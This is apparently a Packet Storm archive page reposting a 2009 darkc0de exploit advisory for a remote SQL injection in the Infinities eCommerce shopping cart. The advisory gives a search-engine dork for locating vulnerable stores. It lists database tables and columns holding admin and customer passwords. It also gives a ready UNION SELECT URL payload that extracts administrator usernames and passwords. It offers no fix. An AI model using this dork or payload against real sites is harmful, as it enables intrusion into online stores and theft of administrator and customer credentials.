exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Infinities eCommerce SQL Injection

Infinities eCommerce SQL Injection
Posted May 19, 2009
Authored by P47r1ck | Site darkc0de.com

Infinities eCommerce Web Hosting and Shopping Cart Solution suffer from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
SHA-256 | dcdf12f5f82bebd42eb7e70b6a8766ef74e3a110a946514b3ffa6de9c9754c30
Download | Favorite | View

Infinities eCommerce SQL Injection

Change Mirror Download
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
#  d3hydr8 - rsauron - baltazar - low1z - houbysoft - beenu    #
#                   and all darkc0de members                   #
################################################################
#
# Author: p47r1ck
#
# Home  : www.darkc0de.com
#
# Email : P47r1ckro[at]gmail[dot]com
#
# Share the c0de!
#
################################################################
#
#      Vendor: http://www.infinities.com/
#
#    ©1997-2008 Infinities eCommerce Web Hosting
#           and Shopping Cart Solution
#
################################################################
#
#   Dork: intext:"e-commerce powered by Infinities.com"
#
#   Their product, Online Store and Shopping Cart
#   suffers of a Normal SQLi
#
#   MySQL Version 4
#   Table name : config,administration,customers,orders
#   Columns found for administration : username,password
#   Columns found for customers : email,password,ipaddress,lastname,phone
#
#
#
#   Example:
#
#   Http://www.infinities.com/onlinestore/detail.cfm?ID=CA-ST825S&storeid=1
#   union+select+all+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13
#   14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,
#   34,35,36,37,38,39,40,41,42,43,44,45+from+administration--
#
#
################################################################
# Vuln Discovered 16 May 2009
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close